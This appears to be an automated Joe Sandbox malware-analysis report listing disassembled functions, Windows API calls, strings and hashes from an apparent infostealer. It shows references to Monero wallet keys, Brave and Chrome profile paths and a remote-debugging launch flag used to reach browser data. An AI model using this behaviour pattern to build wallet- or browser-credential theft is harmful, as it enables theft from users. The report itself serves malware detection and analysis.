Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 717f546711a80aef71ec6c4362653d061c855e3aca5c90f09dd377409c4884a6
Instruction ID: 5c0759a56ad5ca0c529043652b61fa0acdabf70ed1285eb6f3dda8b97adcc07b
Opcode Fuzzy Hash: 717f546711a80aef71ec6c4362653d061c855e3aca5c90f09dd377409c4884a6
Instruction Fuzzy Hash: EE1121309502089BCB58FFA4DD52AEE773AAF50380F80455CF91A5B4D2EF30AB44CA55

Function 00607A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607AA0
RtlAllocateHeap.NTDLL(00000000), ref: 00607AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00607ABF

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: e3512950b79634b7e4067246c84191a96511c1c17bde9177d7a47c7990233bd8
Instruction ID: 6671d3de4b9baf0f3fcb6c6b44e94d54a63fb6445d2d712a6ae58dfa09bdba38
Opcode Fuzzy Hash: e3512950b79634b7e4067246c84191a96511c1c17bde9177d7a47c7990233bd8
Instruction Fuzzy Hash: 8D0186B1A88249ABD704CF99DD45FAFBBB8FB04711F100219F506E22C0D7B45A008BA1

Function 005F1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
ExitProcess.KERNEL32 ref: 005F1143

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 4a46152fff45ee92e7d3e7d049d5b007cd3ccc34508f085fdfc53511698f4540
Instruction ID: 8b45a1b4db11d8e07e674a6aa9801c1615c73212e7b55d7c94bf92273aa711cd
Opcode Fuzzy Hash: 4a46152fff45ee92e7d3e7d049d5b007cd3ccc34508f085fdfc53511698f4540
Instruction Fuzzy Hash: FBE0E67094930DFBE7105B91DD0EF5D7A7CBB04B16F104155F709761D0C6B525409A5D

Function 005F10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005F10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005F10F7

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 690d959f7e85c3976eeb8c865cdf77a6bc02236c0a178eca2e9d9aa49e139bfd
Instruction ID: ad697945713ea808260f4e0043166895192d2048327b6dd22bd0594265d5f579
Opcode Fuzzy Hash: 690d959f7e85c3976eeb8c865cdf77a6bc02236c0a178eca2e9d9aa49e139bfd
Instruction Fuzzy Hash: 49F082B1681218BBE714AAA4AC59FAFB7ECF705B05F300448F645E7280DA759F009AA4

Function 005F1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00607A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607AA0
Part of subcall function 00607A70: RtlAllocateHeap.NTDLL(00000000), ref: 00607AA7
Part of subcall function 00607A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00607ABF

Part of subcall function 006079E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607A10
Part of subcall function 006079E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607A17
Part of subcall function 006079E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00607A2F

ExitProcess.KERNEL32 ref: 005F11C6

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: b1a7d17311435c714b054470e411b17584f0a531121d9d2e181f83006e9d681d
Instruction ID: 8ea951406bdbb942088e7adaadffee3d20ccf435d5520fbd42d59706ad6c37dc
Opcode Fuzzy Hash: b1a7d17311435c714b054470e411b17584f0a531121d9d2e181f83006e9d681d
Instruction Fuzzy Hash: 39E0ECA594460597CA54B3B56C06F6B369D6B1430AF040818FA0492182FE35F8108669

Non-executed Functions

Function 005FBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

FindFirstFileA.KERNEL32(00000000,?,00610B32,00610B2F,00000000,?,?,?,00611450,00610B2E), ref: 005FBEC5
StrCmpCA.SHLWAPI(?,00611454), ref: 005FBF33
StrCmpCA.SHLWAPI(?,00611458), ref: 005FBF49
FindNextFileA.KERNEL32(000000FF,?), ref: 005FC8A9
FindClose.KERNEL32(000000FF), ref: 005FC8BB

Strings

--remote-debugging-port=9229 --profile-directory=", xrefs: 005FC534
Brave, xrefs: 005FC0E8
\Brave\Preferences, xrefs: 005FC1C1
Preferences, xrefs: 005FC104
--remote-debugging-port=9229 --profile-directory=", xrefs: 005FC3B2
--remote-debugging-port=9229 --profile-directory=", xrefs: 005FC495
Google Chrome, xrefs: 005FC6F8

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: fd5db4aa1c29304f32dd500de1ddae9968e16ab5668c3da60b3e21997667f391
Instruction ID: e041927b122c59dee4611d251fead1e5c11747a209ffd3acf4f6b4c013e99172
Opcode Fuzzy Hash: fd5db4aa1c29304f32dd500de1ddae9968e16ab5668c3da60b3e21997667f391
Instruction Fuzzy Hash: A7520F726502089BCB58FBA0DD96EEF773EAF54340F40459CB50A660D1EF349A88CF66

Function 00603B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00603B1C
FindFirstFileA.KERNEL32(?,?), ref: 00603B33
lstrcat.KERNEL32(?,?), ref: 00603B85
StrCmpCA.SHLWAPI(?,00610F58), ref: 00603B97
StrCmpCA.SHLWAPI(?,00610F5C), ref: 00603BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00603EB7
FindClose.KERNEL32(000000FF), ref: 00603ECC

Strings

%s%s, xrefs: 00603CFD
%s\%s\%s, xrefs: 00603C9A
%s\%s, xrefs: 00603CBF
%s\%s, xrefs: 00603BCA
%s\*, xrefs: 00603B10

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 3db8bcf147d320af82cf854229732c657f138d9c432ed91f3963e70acd8e784c
Instruction ID: e68a1361add25040a961d3cd395572f601b72d1b26fdcd64b7d09820f15fccf2
Opcode Fuzzy Hash: 3db8bcf147d320af82cf854229732c657f138d9c432ed91f3963e70acd8e784c
Instruction Fuzzy Hash: DEA14171A402189FDB24DFA4DC85FEA737DBF88301F044599B60E96281EB759B84CF61

Function 00604B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00604B7C
FindFirstFileA.KERNEL32(?,?), ref: 00604B93
StrCmpCA.SHLWAPI(?,00610FC4), ref: 00604BC1
StrCmpCA.SHLWAPI(?,00610FC8), ref: 00604BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00604DCD
FindClose.KERNEL32(000000FF), ref: 00604DE2

Strings

%s\*, xrefs: 00604B70
%s\%s, xrefs: 00604C4B
%s\%s, xrefs: 00604BF4

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 7d3a16b116bc862252c47c073f0f2282b9db206d87a46ea6bed5d6a37218b8dd
Instruction ID: d8d93d1a89eec06df4a66697597f5203d5ac581e4cfdb66e6828e813775a16cd
Opcode Fuzzy Hash: 7d3a16b116bc862252c47c073f0f2282b9db206d87a46ea6bed5d6a37218b8dd
Instruction Fuzzy Hash: 066148B1904219ABDB34EBA0DC49FEA737DBB48700F04859CF60A96181EF759B85CF91

Function 006047C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006047D0
RtlAllocateHeap.NTDLL(00000000), ref: 006047D7
wsprintfA.USER32 ref: 006047F6
FindFirstFileA.KERNEL32(?,?), ref: 0060480D
StrCmpCA.SHLWAPI(?,00610FAC), ref: 0060483B
StrCmpCA.SHLWAPI(?,00610FB0), ref: 00604851
FindNextFileA.KERNEL32(000000FF,?), ref: 006048DB
FindClose.KERNEL32(000000FF), ref: 006048F0
lstrcat.KERNEL32(?,00F4FCB0), ref: 00604915
lstrcat.KERNEL32(?,00F4E168), ref: 00604928
lstrlen.KERNEL32(?), ref: 00604935
lstrlen.KERNEL32(?), ref: 00604946

Strings

%s\%s, xrefs: 0060486B
%s\*, xrefs: 006047EA

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 153dcb438154c6710c151c854e46f040304a82ae95b19c6741a2ad71fca3b5b4
Instruction ID: fe4dc1fc93091abb888677779c6c1e454df854a42f26c8b90373b3d8b8387f3c
Opcode Fuzzy Hash: 153dcb438154c6710c151c854e46f040304a82ae95b19c6741a2ad71fca3b5b4
Instruction Fuzzy Hash: 425173B15442089BDB64EB70DC89FEE737DBB58300F408598B64A96190EF74DB88CF91

Function 006040F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00604113
FindFirstFileA.KERNEL32(?,?), ref: 0060412A
StrCmpCA.SHLWAPI(?,00610F94), ref: 00604158
StrCmpCA.SHLWAPI(?,00610F98), ref: 0060416E
FindNextFileA.KERNEL32(000000FF,?), ref: 006042BC
FindClose.KERNEL32(000000FF), ref: 006042D1

Strings

%s\%s, xrefs: 00604107

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 0c1fd46e8c4b69c0806fbdf12b8d9dc693bfcbe7046ce3fa2b44d1ee58af88d7
Instruction ID: ae5027fb21f28286b9da960d4cf493bf8000013c20b686e570a9a243071fc2c4
Opcode Fuzzy Hash: 0c1fd46e8c4b69c0806fbdf12b8d9dc693bfcbe7046ce3fa2b44d1ee58af88d7
Instruction Fuzzy Hash: A65166B1544218ABCB28EBB0DC85EEA737DBB58300F4045DCB65A96090EF759BC9CF54

Function 005FEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 005FEE3E
FindFirstFileA.KERNEL32(?,?), ref: 005FEE55
StrCmpCA.SHLWAPI(?,00611630), ref: 005FEEAB
StrCmpCA.SHLWAPI(?,00611634), ref: 005FEEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 005FF3AE
FindClose.KERNEL32(000000FF), ref: 005FF3C3

Strings

%s\*.*, xrefs: 005FEE32

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
